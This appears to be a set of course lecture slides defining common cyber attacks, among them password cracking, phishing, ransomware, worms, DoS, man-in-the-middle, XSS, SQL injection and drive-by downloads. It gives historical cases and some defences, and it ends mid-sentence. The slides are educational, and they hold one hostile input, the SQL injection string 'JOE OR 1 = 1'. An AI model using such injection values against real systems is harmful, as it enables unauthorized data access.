UNIT 3

CYBER ATTACKS (definitions and examples):

Denial-of-service attacks, Man-in-the middle
attack, Phishing, spoofing and spam attacks,
Drive-by attack, Password attack,
SQL injection attack, Cross-site scripting attack,
Eavesdropping attack, Birthday attack,
Malware attacks, Social Engineering attacks
1
Cracker & Phreaker
• Cracker: A hacker who intentionally removes or bypasses software
copyright protection designed to prevent unauthorized duplication or
use.
• Phreaker : A hacker who manipulates the public telephone system to
make free calls or disrupt services.

2
Password Attacks
• 10.4 Password rule: An industry recommendation for password structure and
strength that specifies passwords should be at least 10 characters long and contain
at least one uppercase letter, one lowercase letter, one number, and one special
character.
• Brute force password attack : An attempt to guess a password by attempting every
possible combination of characters and numbers in it.
• Cracking: Attempting to reverse-engineer, remove, or bypass a password or other
access control protection, such as the copyright protection on software. See cracker.
• Dictionary password attack: A variation of the brute force password attack that
attempts to narrow the range of possible passwords guessed by using a list of
common passwords and possibly including attempts based on the target’s personal
information.
• Rainbow table: A table of hash values and their corresponding plaintext values that
can be used to look up password values if an attacker is able to steal a system’s
encrypted password file. 3
Password Attacks
• Password attacks fall under the category of espionage or trespass just
as lock-picking falls under breaking and entering. Attempting to guess
or reverse-calculate a password is often called cracking. There are a
number of alternative approaches to password cracking:
• • Brute force
• • Dictionary
• • Rainbow tables
• • Social engineering

4
Brute force attack

• Brute Force The application of computing and network resources to try

every possible password combination is called a brute force password
attack. If attackers can narrow the field of target accounts, they can devote
more time and resources to these accounts. This is one reason to always
change the password of the manufacturer’s default administrator account.
• Brute force password attacks are rarely successful against systems that have
adopted the manufacturer’s recommended security practices. Controls that
limit the number of unsuccessful access attempts within a certain time are
very effective against brute force attacks.
• As shown in Table 2-6, the strength of a password determines its ability to
withstand a brute force attack. Using best practice policies like the 10.4
password rule and systems that allow case-sensitive passwords can greatly
enhance their strength.
5
Table 2.6

6
Dictionary Attacks
• Dictionary Attacks The dictionary password attack, or simply
dictionary attack, is a variation of the brute force attack that narrows
the field by using a dictionary of common passwords and includes
information related to the target user, such as names of relatives or
pets, and familiar numbers such as phone numbers, addresses, and
even Social Security numbers.
• Organizations can use similar dictionaries to disallow passwords
during the reset process and thus guard against passwords that are
easy to guess. In addition, rules requiring numbers and special
characters in passwords make the dictionary attack less effective.

7
Rainbow Tables
• Rainbow Tables A far more sophisticated and potentially much faster
password attack is possible if the attacker can gain access to an
encrypted password file, such as the Security Account Manager (SAM)
data file.
• While these password files contain hashed representations of users’
passwords—not the actual passwords, and thus cannot be used by
themselves—the hash values for a wide variety of passwords can be
looked up in a database known as a rainbow table.
• These plain text files can be quickly searched, and a hash value and its
corresponding plaintext value can be easily located.

8
Social Engineering Password Attacks
• Social Engineering Password Attacks While social engineering is discussed
in detail later in the section called “Human Error or Failure,” it is worth
mentioning here as a mechanism to gain password information.
• Attackers posing as an organization’s IT professionals may attempt to gain
access to systems information by contacting low-level employees and
offering to help with their computer issues.
• After all, what employee doesn’t have issues with computers? By posing as
a friendly helpdesk or repair technician, the attacker asks employees for
their usernames and passwords, then uses the information to gain access
to organizational systems.
• Some even go so far as to actually resolve the user’s issues. Social
engineering is much easier than hacking servers for password files.
9
Social Engineering
• Advance-fee fraud (AFF): A form of social engineering, typically conducted
via e-mail, in which an organization or some third party indicates that the
recipient is due an exorbitant amount of money and needs only a small
advance fee or personal banking information to facilitate the transfer.
• Phishing: A form of social engineering in which the attacker provides what
appears to be a legitimate communication (usually e-mail), but it contains
hidden or embedded code that redirects the reply to a third-party site in an
effort to extract personal or confidential information.
• Pretexting: A form of social engineering in which the attacker pretends to
be an authority figure who needs information to confirm the target’s
identity, but the real object is to trick the target into revealing confidential
information. Pretexting is commonly performed by telephone.
• social engineering: The process of using social skills to convince people to
reveal access credentials or other valuable information to an attacker.
• Spear phishing: Any highly targeted phishing attack.
10
Advance-fee Fraud
• Advance-fee Fraud Another social engineering attack called the advance-fee
fraud (AFF), internationally known as the 4-1-9 fraud, is named after a section of
the Nigerian penal code.
• The perpetrators of 4-1-9 schemes often use the names of fictitious companies,
such as the Nigerian National Petroleum Company.
• Alternatively, they may invent other entities, such as a bank, government agency,
long-lost relative, lottery, or other nongovernmental organization.
• See Figure 2-10 for a sample letter used for this type of scheme.
• The scam is notorious for stealing funds from credulous people, first by requiring
them to participate in a proposed money-making venture by sending money up
front, and then by soliciting an endless series of fees.
• These 4-1-9 schemes are even suspected to involve kidnapping, extortion, and
murder.
• According to Ultrascan Advanced Global Investigations, more than $82 billion had
been swindled from victims as of 2014.
• For more information on AFF, go to the Advance Fee Fraud Coalition’s Web site at
http:// affcoalition.org. 11
Figure 2.10

12
Information Extortion
• Information extortion: The act of an attacker or trusted
insider who steals or interrupts access to information from a
computer system and demands compensation for its return
or for an agreement not to disclose the information.
• Ransomware: Computer software specifically designed to
identify and encrypt valuable information in a victim’s
system in order to extort payment for the key needed to
unlock the encryption.

13
Information extortion
• Information extortion, also known as cyberextortion, is common in
the theft of credit card numbers.
• For example, Web-based retailer CD Universe was victimized by a
theft of data files that contained customer credit card information.
• The culprit was a Russian hacker named Maxus who hacked the
online vendor and stole several hundred thousand credit card
numbers.
• When the company refused to pay the $100,000 blackmail, he posted
the card numbers to a Web site, offering them to the criminal
community. His Web site became so popular he had to restrict access.
14
Information extortion
• Another incident of extortion occurred in 2008 when pharmacy benefits
manager Express Scripts, Inc. fell victim to a hacker who demonstrated that
he had access to 75 customer records and claimed to have access to
millions more.
• The perpetrator demanded an undisclosed amount of money. The
company notified the FBI and offered a $1 million reward for the arrest of
the perpetrator.
• Express Scripts notified the affected customers, as required by various state
laws.
• The company was obliged to pay undisclosed expenses for the
notifications, and was required to buy credit monitoring services for its
customers in some states
15
• In 2010, Anthony Digati allegedly threatened to conduct a spam
attack on the insurance company New York Life.
• He reportedly sent dozens of e-mails to company executives
threatening to conduct a negative image campaign by sending over 6
million e-mails to people throughout the country.
• He then demanded approximately $200,000 to stop the attack, and
next threatened to increase the demand to more than $3 million if
the company ignored him. His arrest thwarted the spam attack.

16
• In 2012, a programmer from Walachi Innovation Technologies allegedly
broke into the organization’s systems and changed the access passwords
and codes, locking legitimate users out of the system. He then reportedly
demanded $300,000 in exchange for the new codes.
• A court order eventually forced him to surrender the information to the
organization.
• In Russia, a talented hacker created malware that installed inappropriate
materials on an unsuspecting user’s system, along with a banner
threatening to notify the authorities if a bribe was not paid.
• At 500 rubles (about $17), victims in Russia and other countries were more
willing to pay the bribe than risk prosecution by less considerate law
enforcement.
17
Ransomware
• The latest type of attack in this category is known as ransomware. Ransomware is
a malware attack on the host system that denies access to the user and then
offers to provide a key to allow access back to the user’s system and data for a
fee.
• There are two types of ransomware: lockscreen and encryption.
• Lockscreen ransomware denies access to the user’s system simply by disabling
access to the desktop and preventing the user from bypassing the ransom screen
that demands payment.
• Encryption ransomware is far worse, in that it encrypts some or all of a user’s
hard drive and then demands payment. Common phishing mechanisms to get a
user to download ransomware include popups indicating that illegal information
or malware was detected on the user’s system, threatening to notify law
enforcement, or offering to delete the offending material if the user clicks a link
or button.

18
Online Activism
• Cyberactivist: See hacktivist.
• Cyberterrorist: A hacker who attacks systems to conduct terrorist
activities via networks or Internet pathways.
• Cyberwarfare: Formally sanctioned offensive operations conducted by
a government or state against information or systems of another
government or state. Sometimes called information warfare.
• Hacktivist: A hacker who seeks to interfere with or disrupt systems to
protest the operations, policies, or actions of an organization or
government agency.

19
Cyberterrorism and Cyberwarfare
• A much more sinister form of hacking is cyberterrorism. The United
States and other governments are developing security measures
intended to protect critical computing and communications networks
as well as physical and power utility infrastructures.
• Cyberterrorism has thus far been largely limited to acts such as the
defacement of NATO Web pages during the war in Kosovo. Some
industry observers have taken the position that cyberterrorism is not
a real threat, but instead is merely hype that distracts from more
concrete and pressing information security issues that do need
attention.

20
Software Attacks
• Deliberate software attacks occur when an individual or group
designs and deploys software to attack a system.
• This attack can consist of specially crafted software that attackers
trick users into installing on their systems.
• This software can be used to overwhelm the processing capabilities of
online systems or to gain access to protected systems by hidden
means.

21
Malware
• Malware is referred to as malicious code or malicious software. Other
attacks that use software, like redirect attacks and denial-of-service
attacks, also fall under this threat.
• These software components or programs are designed to damage,
destroy, or deny service to targeted systems.
• Note that the terminology used to describe malware is often not
mutually exclusive; for instance, Trojan horse malware may be
delivered as a virus, a worm, or both.

22
Malware
• Malicious code attacks include the execution of viruses, worms, Trojan horses, and active
Web scripts with the intent to destroy or steal information.
• The most state-of-the-art malicious code attack is the polymorphic worm, or multivector
worm.
• These attack programs use up to six known attack vectors to exploit a variety of
vulnerabilities in common information system devices.
• Many successful malware attacks are completed using techniques that are widely known;
some have been in use for years.
• When an attack makes use of malware that is not yet known by the anti-malware
software companies, it is said to be a zero-day attack.
• Other forms of malware include covert software applications—bots, spyware, and
adware— that are designed to work out of users’ sight or be triggered by an apparently
innocuous user action.
• Bots are often the technology used to implement Trojan horses, logic bombs, back
doors, and spyware.
• Spyware is placed on a computer to secretly gather information about the user and
report it.
23
Malware
• One type of spyware is a Web bug, a tiny graphic that is referenced
within the Hypertext Markup Language (HTML) content of a Web
page or e-mail to collect information about the user viewing the
content.
• Another form of spyware is a tracking cookie, which is placed on
users’ computers to track their activity on different Web sites and
create a detailed profile of their behavior.
• Each of these hidden code components can be used to collect user
information that could then be used in a social engineering or identity
theft attack.

24
Table 2-7 draws on two recent studies to list some of the malware that has had the
biggest impact on computer users to date.

25
Malware(Key Term)
• Adware: Malware intended to provide undesired marketing and
advertising, including popups and banners on a user’s screens.
• Boot virus: Also known as a boot sector virus, a type of virus that targets
the boot sector or Master Boot Record (MBR) of a computer system’s hard
drive or removable storage media.
• Macro virus: A type of virus written in a specific macro language to target
applications that use the language. The virus is activated when the
application’s product is opened. A macro virus typically affects documents,
slideshows, e-mails, or spreadsheets created by office suite applications.
• Malware: Computer software specifically designed to perform malicious or
unwanted actions.
• Memory-resident virus: A virus that is capable of installing itself in a
computer’s operating system, starting when the computer is activated, and
residing in the system’s memory even after the host application is
terminated. Also known as a resident virus.
26
Malware(Key Term)
• Non-memory-resident virus A virus that terminates after it has been activated, infected its host
system, and replicated itself. NMR viruses do not reside in an operating system or memory after
executing. Also known as a non-resident virus.
• Polymorphic threat Malware (a virus or worm) that over time changes the way it appears to
antivirus software programs, making it undetectable by techniques that look for preconfigured
signatures.
• Spyware: Any technology that aids in gathering information about people or organizations
without their knowledge.
• Trojan horse: A malware program that hides its true nature and reveals its designed behavior only
when activated.
• virus A type of malware that is attached to other executable programs. When activated, it
replicates and propagates itself to multiple systems, spreading by multiple communications
vectors. For example, a virus might send copies of itself to all users in the infected system’s e-mail
program.
• Virus hoax: A message that reports the presence of a nonexistent virus or worm and wastes
valuable time as employees share the message.
• Worm: A type of malware that is capable of activation and replication without being attached to
an existing program.
• Zero-day attack: An attack that makes use of malware that is not yet known by the anti-malware
software companies.
27
Virus
• Virus: A computer virus consists of code segments (programming instructions)
that perform malicious actions.
• This code behaves much like a virus pathogen that attacks animals and plants,
using the cell’s own replication machinery to propagate the attack beyond the
initial target.
• The code attaches itself to an existing program and takes control of the program’s
access to the targeted computer.
• The virus-controlled target program then carries out the virus plan by replicating
itself into additional targeted systems. Often, users unwittingly help viruses get
into a system.
• Opening infected e-mail or some other seemingly trivial action can cause
anything from random messages appearing on a user’s screen to the destruction
of entire hard drives.
• Just as their namesakes are passed among living bodies, computer viruses are
passed from machine to machine via physical media, e-mail, or other forms of
computer data transmission.
• When these viruses infect a machine, they may immediately scan it for e-mail
applications or even send themselves to every user in the e-mail address book.
28
Virus
• One of the most common methods of virus transmission is via e-mail attachment
files.
• Most organizations block e-mail attachments of certain types and filter all e-mail
for known viruses.
• Years ago, viruses were slow-moving creatures that transferred viral payloads
through the cumbersome movement of diskettes from system to system.
• Now computers are networked, and e-mail programs prove to be fertile ground
for computer viruses unless suitable controls are in place.
• The current software marketplace has several established vendors, such as
Symantec Norton AntiVirus, Kaspersky Antivirus, AVG AntiVirus, and McAfee
VirusScan, which provide applications to help control computer viruses.
• Microsoft’s Malicious Software Removal Tools is freely available to help users of
Windows operating systems remove viruses and other types of malware.
• Many vendors are moving to software suites that include antivirus applications
and provide other malware and nonmalware protection, such as firewall
protection programs.
29
Virus
• Viruses can be classified by how they spread themselves.
• Among the most common types of information system viruses are the macro
virus, which is embedded in automatically executing macro code used by word
processors, spreadsheets, and database applications, and the boot virus, which
infects the key operating system files in a computer’s boot sector.
• Viruses can also be described by how their programming is stored and moved.
Some are found as binary executables, including .exe or .com files; or as
interpretable data files, such as command scripts or a specific application’s
document files; or both.
• Alternatively, viruses may be classified as memory-resident viruses or non-
memory-resident viruses, depending on whether they persist in a computer
system’s memory after they have been executed.
• Resident viruses are capable of reactivating when the computer is booted and
continuing their actions until the system is shut down, only to restart the next
time the system is booted.
• In 2002, the author of the Melissa virus, David L. Smith of New Jersey, was
convicted in U.S. federal court and sentenced to 20 months in prison, a $5,000
fine, and 100 hours of community service upon release.
30
Viruses and worms can use several attack vectors to spread
copies of themselves to networked peer computers, as
illustrated in Table 2-8.

31
Worms
• Worms Named for the tapeworm in John Brunner’s novel The Shockwave
Rider, worms can continue replicating themselves until they completely fill
available resources, such as memory, hard drive space, and network
bandwidth. Read the nearby Offline feature about Robert Morris to learn
how much damage a worm can cause.
• Code Red, Sircam, Nimda (“admin” spelled backwards), and Klez are
examples of a class of worms that combine multiple modes of attack into a
single package. Figure 2-15 shows sample e-mails that contain the Nimda
and Sircam worms.
• These newer worm variants contain multiple exploits that can use any
predefined distribution vector to programmatically distribute the worm.
(See the section on polymorphic threats later in this chapter for more
details.)

32
Figure 2-15 shows sample e-mails that
contain the Nimda and Sircam worms.

33
Worms
• Even though it happened long ago, the outbreak of Nimda in September
2001 still serves as an example of how quickly and widely malware can
spread.
• It used five of the six vectors shown in Table 2-8 to spread itself with
startling speed.
• TruSecure Corporation, an industry source for information security
statistics and solutions, reports that Nimda spread across the Internet
address space of 14 countries in less than 25 minutes.
• The Klez worm, shown in Figure 2-16, delivers a double-barreled payload: It
has an attachment that contains the worm, and if the e-mail is viewed on
an HTML-enabled browser, it attempts to deliver a macro virus.
• News-making attacks, such as MyDoom and Netsky, are variants of the
multifaceted attack worms and viruses that exploit weaknesses in leading
operating systems and applications.
34
Worms
• The complex behavior of worms can be initiated with or without the user
downloading or executing the file. Once the worm has infected a computer,
it can redistribute itself to all e-mail addresses found on the infected
system. Furthermore, a worm can deposit copies of itself onto all Web
servers that the infected system can reach; users who subsequently visit
those sites become infected. Worms also take advantage of open shares
found on the network in which an infected system is located. The worms
place working copies of their code onto the server so that users of the
open shares are likely to become infected.
• In 2003, Jeffrey Lee Parson, an 18-year-old high school student from
Minnesota, was arrested for creating and distributing a variant of the
Blaster worm called W32.Blaster-B. He was sentenced to 18 months in
prison, 3 years of supervised release, and 100 hours of community
service.The original Blaster worm was reportedly created by a Chinese
hacker group.
35
Trojan Horses
• Trojan Horses Trojan horses are frequently disguised as helpful, interesting, or necessary
pieces of software, such as the readme.exe files often included with shareware or
freeware packages.
• Like their namesake in Greek legend, once Trojan horses are brought into a system, they
become activated and can wreak havoc on the unsuspecting user.
• Figure 2-17 outlines a typical Trojan horse attack.
• Around January 20, 1999, Internet e-mail users began receiving messages with an
attachment of a Trojan horse program named Happy99.exe.
• When the e-mail attachment was opened, a brief multimedia program displayed
fireworks and the message “Happy 1999.”
• While the fireworks display was running, the Trojan horse program was installing itself
into the user’s system.
• The program continued to propagate itself by following up every e-mail the user sent
with a second e-mail to the same recipient and with the same attack program attached.
• A newer variant of the Trojan horse is an attack known as SMiShing, in which the victim is
tricked into downloading malware onto a mobile phone via a text message.
• SMiShing is short for SMS phishing.
36
Figure 2-17 outlines a typical Trojan horse attack

37
Polymorphic Threats
• Polymorphic Threats One of the biggest
challenges to fighting viruses and worms has
been the emergence of polymorphic threats.
• A polymorphic threat actually evolves, changing
its size and other external file characteristics to
elude detection by antivirus software programs.

38
Virus and Worm Hoaxes
• Virus and Worm Hoaxes As frustrating as viruses and worms are, perhaps more
time and money are spent resolving virus hoaxes.
• Well-meaning people can disrupt the harmony and flow of an organization when
they send group e-mails warning of supposedly dangerous viruses that don’t
exist.
• When people fail to follow virus-reporting procedures in response to a hoax, the
network becomes overloaded and users waste time and energy forwarding the
warning message to everyone they know, posting the message on bulletin boards,
and trying to update their antivirus protection software.
• Some hoaxes are the chain letters or chain e-mails of the day, which are designed
to annoy or bemuse the reader.
• They are known as “weapons of mass distraction.” One of the most prominent
virus hoaxes was the 1994 “Goodtimes virus,” which reportedly was transmitted
in an e-mail with the header “Good Times” or “goodtimes.” The virus never
existed, and thousands of hours of employee time were wasted retransmitting
the e-mail, effectively creating a denial of service.
39
Virus and Worm Hoaxes
• At one time, hoaxes amounted to little more than pranks, although
occasionally a sting was attached.
• For example, the Teddy Bear hoax tricked users into deleting necessary
operating system files, which made their systems stop working.
• Recently, criminals have been able to monetize the hoax virus by claiming
that systems are infected with malware and then selling a cure for a
problem that does not exist.
• The perpetrator of the hoax may then offer to sell a fake antivirus program
to correct the fake malware.
• Several Internet resources enable people to research viruses and
determine if they are fact or fiction.

40
Back Doors
• Back door: A malware payload that provides access to a system by bypassing normal
access controls. A back door may also be an intentional access control bypass left by a
system designer to facilitate development.
• Using a known or newly discovered access mechanism, an attacker can gain access to a
system or network resource through a back door.
• Viruses and worms can have a payload that installs a back door or trap door component
in a system, allowing the attacker to access the system at will with special privileges.
• Examples of such payloads include Subseven and Back Orifice.
• Sometimes these doors are left behind by system designers or maintenance staff; such a
door is referred to as a maintenance hook.
• More often, attackers place a back door into a system or network they have
compromised, making their return to the system that much easier the next time.
• A trap door is hard to detect because the person or program that places it often makes
the access exempt from the system’s usual audit logging features and makes every
attempt to keep the back door hidden from the system’s legitimate owners.
41
Denial-of-Service (DoS) and Distributed
Denial-of-Service (DDoS) Attacks
• Bot: An abbreviation of robot, an automated software program that
executes certain commands when it receives a specific input. See also
zombie.
• Denial-of-service (DoS) attack An attack that attempts to overwhelm a
computer target’s ability to handle incoming communications,
prohibiting legitimate users from accessing those systems.
• Distributed denial-of-service (DDoS) attack A form of DoS attack in
which a coordinated stream of requests is launched against a target
from many locations at the same time using bots or zombies.
• zombie See bot.
42
Denial-of-Service (DoS) and Distributed
Denial-of-Service (DDoS) Attacks
• In a denial-of-service (DoS) attack, the attacker sends a large number of
connection or information requests to a target (see Figure 2-18). So many
requests are made that the target system becomes overloaded and cannot
respond to legitimate requests for service. The system may crash or simply
become unable to perform ordinary functions.
• In a distributed denial-of-service (DDoS) attack, a coordinated stream of
requests is launched against a target from many locations at the same
time. Most DDoS attacks are preceded by a preparation phase in which
many systems, perhaps thousands, are compromised. The compromised
machines are turned into bots or zombies, machines that are directed
remotely by the attacker (usually via a transmitted command) to
participate in the attack.

43
Denial-of-Service (DoS) and Distributed
Denial-of-Service (DDoS) Attacks
• DDoS attacks are more difficult to defend against, and currently there are
no controls that any single organization can apply. There are, however,
some cooperative efforts to enable DDoS defenses among groups of service
providers; an example is the Consensus Roadmap for Defeating Distributed
Denial of Service Attacks. To use a popular metaphor, DDoS is considered a
weapon of mass destruction on the Internet.
• The MyDoom worm attack in February 2004 was intended to be a DDoS
attack against www.sco.com, the Web site of a vendor for a UNIX operating
system. Allegedly, the attack was payback for the SCO Group’s perceived
hostility toward the open-source Linux community.
• Any system connected to the Internet and providing TCP-based network
services (such as a Web server, FTP server, or mail server) is vulnerable to
DoS attacks. DoS attacks can also be launched against routers or other
network server systems if these hosts enable other TCP services, such as
echo.
44
Figure 2.18 Denial-of-service (DoS) attack

45
History of notable DoS attacks
• Prominent in the history of notable DoS attacks are those conducted by
Michael Calce (a.k.a. Mafiaboy) on Amazon.com, CNN.com, ETrade.com,
ebay.com, Yahoo.com, Excite.com, and Dell.com.
• These software-based attacks lasted approximately four hours and
reportedly resulted in millions of dollars in lost revenue. The British ISP
CloudNine is believed to be the first business “hacked out of existence” by
a DoS attack in January 2002.
• This attack was similar to the DoS attacks launched by Mafiaboy in
February 2000. In January 2016, a group calling itself New World Hacking
attacked the BBC’s Web site.
• If the scope of the attack is verified, it would qualify as the largest DDoS
attack in history, with an attack rate of 602 Gbps (gigabits per second). The
group also hit Donald Trump’s campaign Web site on the same day.

46
E-mail Attacks
• Mail bomb: An attack designed to overwhelm the receiver with
excessive quantities of e-mail.
• Spam: Undesired e-mail, typically commercial advertising transmitted
in bulk.

47
Spam
• Spam is unsolicited commercial e-mail. While many consider spam a
trivial nuisance rather than an attack, it has been used as a means of
enhancing malicious code attacks.
• In March 2002, there were reports of malicious code embedded in
MP3 files that were included as attachments to spam.
• The most significant consequence of spam, however, is the waste of
computer and human resources.
• Many organizations attempt to cope with the flood of spam by using
e-mail filtering technologies.
• Other organizations simply tell users of the mail system to delete
unwanted messages.

48
Spam
• A form of e-mail attack that is also a DoS attack is called a mail bomb. It can be
accomplished using traditional e-mailing techniques or by exploiting various
technical flaws in the Simple Mail Transport Protocol (SMTP).
• The target of the attack receives an unmanageably large volume of unsolicited e-
mail.
• By sending large e-mails with forged header information, attackers can take
advantage of poorly configured e-mail systems on the Internet and trick them
into sending many e-mails to an address of the attackers’ choice.
• If many such systems are tricked into participating, the target e-mail address is
buried under thousands or even millions of unwanted e-mails.
• Although phishing attacks occur via e-mail, they are much more commonly
associated with a method of social engineering designed to trick users to perform
an action, rather than simply making the user a target of a DoS e-mail attack.

49
Communications Interception Attacks
• Domain Name System (DNS) cache poisoning The intentional hacking
and modification of a DNS database to redirect legitimate traffic to
illegitimate Internet locations. Also known as DNS spoofing.
• Packet sniffer: A software program or hardware appliance that can
intercept, copy, and interpret network traffic.
• TCP hijacking: A form of man-in-the-middle attack whereby the
attacker inserts himself into TCP/IP-based communications. TCP/IP is
short for Transmission Control Protocol/Internet Protocol.

50
Packet Sniffer
• Packet Sniffer: A packet sniffer (or simply sniffer) can monitor data traveling
over a network.
• Sniffers can be used both for legitimate network management functions
and for stealing information.
• Unauthorized sniffers can be extremely dangerous to a network’s security
because they are virtually impossible to detect and can be inserted almost
anywhere.
• This feature makes them a favorite weapon in the hacker’s arsenal. Sniffers
often work on TCP/IP networks.
• Sniffers add risk to network communications because many systems and
users send information on local networks in clear text.
• A sniffer program shows all the data going by, including passwords, the
data inside files (such as word-processing documents), and sensitive data
from applications.
51
Pharming
• Pharming: The redirection of legitimate user Web traffic to illegitimate
Web sites with the intent to collect personal information.
• Pharming: Pharming attacks often use Trojans, worms, or other virus
technologies to attack an Internet browser’s address bar so that the valid
URL the user types is modified to be that of an illegitimate Web site.
• A form of pharming called Domain Name System (DNS) cache poisoning
targets the Internet DNS system, corrupting legitimate data tables.
• The key difference between pharming and the social engineering attack
called phishing is that the latter requires the user to actively click a link or
button to redirect to the illegitimate site, whereas pharming attacks modify
the user’s traffic without the user’s knowledge or active participation.

52
Spoofing
• Spoofing: A technique for gaining unauthorized access to computers
using a forged or modified source IP address to give the perception
that messages are coming from a trusted host.
• Spoofing To engage in IP spoofing, hackers use a variety of techniques
to obtain trusted.
• IP addresses and then modify the packet headers (see Figure 2-19) to
insert these forged addresses.
• Newer routers and firewall arrangements can offer protection against
IP spoofing.

53
Figure 2-19

54
Man-in-the-middle attacks
• Man-in-the-middle A group of attacks whereby a person intercepts a
communications stream and inserts himself in the conversation to convince each
of the legitimate parties that he is the other communications partner.
• Some man-in-the-middle attacks involve encryption functions.
• Man-in-the-Middle In the well-known man-in-the-middle attack, an attacker
monitors (or sniffs) packets from the network, modifies them, and inserts them
back into the network.
• In a Figure 2-20 TCP hijacking attack, also known as session hijacking, the attacker
uses address spoofing to impersonate other legitimate entities on the network. It
allows the attacker to eavesdrop as well as to change, delete, reroute, add, forge,
or divert data.
• A variant of TCP hijacking involves the interception of an encryption key
exchange, which enables the hacker to act as an invisible man in the middle—that
is, an eavesdropper—on encrypted communications.
• illustrates these attacks by showing how a hacker uses public and private
encryption keys to intercept messages.
55
Figure 2-20 Man-in-the-middle attacks

56
Cross-Site Scripting Attack
• Cross-Site Scripting (XSS) Cross-site scripting allows the attacker to
acquire valuable information, such as account credentials, account
numbers, or other critical data.
• Often an attacker encodes a malicious link and places it in the target
server, making it look less suspicious.
• After the data is collected by the hostile application, it sends what
appears to be a valid response from the intended server.

57
Cross-site scripting (XSS) attack

• XSS attacks use third-party web resources to run scripts in the victim’s web
browser or scriptable application.
• Specifically, the attacker injects a payload with malicious JavaScript into a
website’s database.
• When the victim requests a page from the website, the website transmits the
page, with the attacker’s payload as part of the HTML body, to the victim’s
browser, which executes the malicious script.
• For example, it might send the victim’s cookie to the attacker’s server, and the
attacker can extract it and use it for session hijacking.
• The most dangerous consequences occur when XSS is used to exploit additional
vulnerabilities.
• These vulnerabilities can enable an attacker to not only steal cookies, but also log
key strokes, capture screenshots, discover and collect network information, and
remotely access and control the victim’s machine.
58
Cross-site scripting (XSS) attack

59
Cross-site scripting (XSS) attack

• While XSS can be taken advantage of within VBScript, ActiveX and

Flash, the most widely abused is JavaScript — primarily because
JavaScript is supported widely on the web.
• To defend against XSS attacks, developers can sanitize data input by
users in an HTTP request before reflecting it back.
• Make sure all data is validated, filtered or escaped before echoing
anything back to the user, such as the values of query parameters
during searches.
• Convert special characters such as ?, &, /, <, > and spaces to their
respective HTML or URL encoded equivalents. Give users the option
to disable client-side scripts.
60
SQL Injection attack
• SQL Injection SQL injection occurs when developers fail to properly validate user input
before using it to query a relational database.
• For example, a fairly innocuous program fragment might expect the user to input a user
ID and then perform a SQL query against the USERS table to retrieve the associated
name:-
• Accept USER-ID from console;
• SELECT USERID, NAME FROM USERS WHERE USERID =USER-ID;
• This is very straightforward SQL syntax; when used correctly, it displays the user ID and
name.
• The problem is that the string accepted from the user is passed directly to the SQL
database server as part of the SQL command.
• What if an attacker enters the string “JOE OR 1 = 1”? This string includes some valid SQL
syntax that will return all rows from the table where the user ID is either “JOE” or “1 = 1.”
Because one is always equal to one, the system returns all user IDs and names.
• The possible effects of the hacker’s “injection” of SQL code into the program are not
limited to improper access to information—what if the attacker included SQL commands
to drop the USERS table, or even shut down the database.

61
Drive-by attacks
• A drive-by download attack refers to the unintentional download of malicious code to your computer or
mobile device that leaves you open to a cyberattack.
• You don't have to click on anything, press download, or open a malicious email attachment to become
infected.
• Drive-by download attacks are a common method of spreading malware.
• Hackers look for insecure websites and plant a malicious script into HTTP or PHP code on one of the pages.
• This script might install malware directly onto the computer of someone who visits the site, or it might re-
direct the victim to a site controlled by the hackers.
• Drive-by downloads can happen when visiting a website or viewing an email message or a pop-up window.
• Unlike many other types of cyber security attacks, a drive-by doesn’t rely on a user to do anything to
actively enable the attack — you don’t have to click a download button or open a malicious email
attachment to become infected.
• A drive-by download can take advantage of an app, operating system or web browser that contains security
flaws due to unsuccessful updates or lack of updates.

62
Drive-by attacks
• To protect yourself from drive-by attacks, you need to keep your
browsers and operating systems up to date and avoid websites that
might contain malicious code.
• Stick to the sites you normally use — although keep in mind that even
these sites can be hacked. Don’t keep too many unnecessary
programs and apps on your device.
• The more plug-ins you have, the more vulnerabilities there are that
can be exploited by drive-by attacks.
•

63
Drive-by downloads

• Silently installs software when

web page is loaded
• Increase exposure by
compromising other sites and
insert code into them
• Sites owners unaware they are
participating in an attack

Provos et al. "All your iFRAMES

Point to Us"

64
Eavesdropping attack
• An eavesdropping attack, also known as a sniffing or snooping attack,
is a theft of information as it is transmitted over a network by a
computer, smartphone, or another connected device.
• The attack takes advantage of unsecured network communications to
access data as it is being sent or received by its user.
• Eavesdropping attacks occur through the interception of network
traffic.
• By eavesdropping, an attacker can obtain passwords, credit card
numbers and other confidential information that a user might be
sending over the network.

65
Eavesdropping can be passive or active
• Eavesdropping can be passive or active:

• Passive eavesdropping — A hacker detects the information by listening to the message

transmission in the network.
• Active eavesdropping — A hacker actively grabs the information by disguising himself as
friendly unit and by sending queries to transmitters. This is called probing, scanning or
tampering.
• Detecting passive eavesdropping attacks is often more important than spotting
active ones, since active attacks requires the attacker to gain knowledge of the
friendly units by conducting passive eavesdropping before.
• Data encryption is the best countermeasure for eavesdropping.

66
Birthday attack
• Birthday attacks are made against hash algorithms that are used to
verify the integrity of a message, software or digital signature.
• A message processed by a hash function produces a message digest
(MD) of fixed length, independent of the length of the input
message; this MD uniquely characterizes the message.
• The birthday attack refers to the probability of finding two random
messages that generate the same MD when processed by a hash
function.
• If an attacker calculates same MD for his message as the user has,
he can safely replace the user’s message with his, and the receiver
will not be able to detect the replacement even if he compares
MDs.

67
Malware attack

• Malicious software can be described as unwanted software that is

installed in your system without your consent. It can attach itself to
legitimate code and propagate; it can lurk in useful applications or
replicate itself across the Internet.
• Here are some of the most common types of malware:
• Macro viruses — These viruses infect applications such as Microsoft
Word or Excel. Macro viruses attach to an application’s initialization
sequence. When the application is opened, the virus executes
instructions before transferring control to the application. The virus
replicates itself and attaches to other code in the computer system.

68
Malware attack…
• File infectors — File infector viruses usually attach themselves to
executable code, such as .exe files. The virus is installed when the
code is loaded. Another version of a file infector associates itself with
a file by creating a virus file with the same name, but an .exe
extension. Therefore, when the file is opened, the virus code will
execute.
• System or boot-record infectors — A boot-record virus attaches to
the master boot record on hard disks. When the system is started, it
will look at the boot sector and load the virus into memory, where it
can propagate to other disks and computers.

69
Malware attack…
• Polymorphic viruses — These viruses conceal themselves through varying cycles
of encryption and decryption. The encrypted virus and an associated mutation
engine are initially decrypted by a decryption program. The virus proceeds to
infect an area of code. The mutation engine then develops a new decryption
routine and the virus encrypts the mutation engine and a copy of the virus with
an algorithm corresponding to the new decryption routine. The encrypted
package of mutation engine and virus is attached to new code, and the process
repeats. Such viruses are difficult to detect but have a high level of entropy
because of the many modifications of their source code. Anti-virus software or
free tools like Process Hacker can use this feature to detect them.
• Stealth viruses — Stealth viruses take over system functions to conceal
